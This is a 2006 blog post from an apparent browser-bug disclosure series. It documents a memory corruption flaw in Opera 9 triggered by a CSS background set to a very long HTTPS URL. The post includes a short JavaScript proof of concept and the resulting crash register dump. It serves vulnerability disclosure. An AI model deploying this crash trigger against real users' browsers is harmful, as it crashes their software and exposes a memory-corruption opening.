Wednesday, July 26, 2006

MoBB #26: Opera CSS Background

The following bug was tested on the latest version of Opera 9 on a fully-patched Windows XP SP2 system. A memory corruption issue can be triggered by setting the background property of any DHTML element to a long HTTPS URL.

var a = document.createElement('a');
var b = 'XXXX';
while (b.length <= 1024*1024) b+=b;
a.style.background = 'url(https://' + b + ')';

Demonstration

eax=0c4f0020 ebx=00000000 ecx=0c4f0020
edx=0a4b0030 esi=00953ff8 edi=00200008
eip=67befb98 esp=0012e38c ebp=0012e404
Opera_679e0000+0x20fb98:
67befb98 668b32 mov si,[edx] ds:0023:0a4b0030=0000

This bug will be added to the OSVDB:
Opera CSS Background Property HTTPS Memory Corruption

No comments:

Post a Comment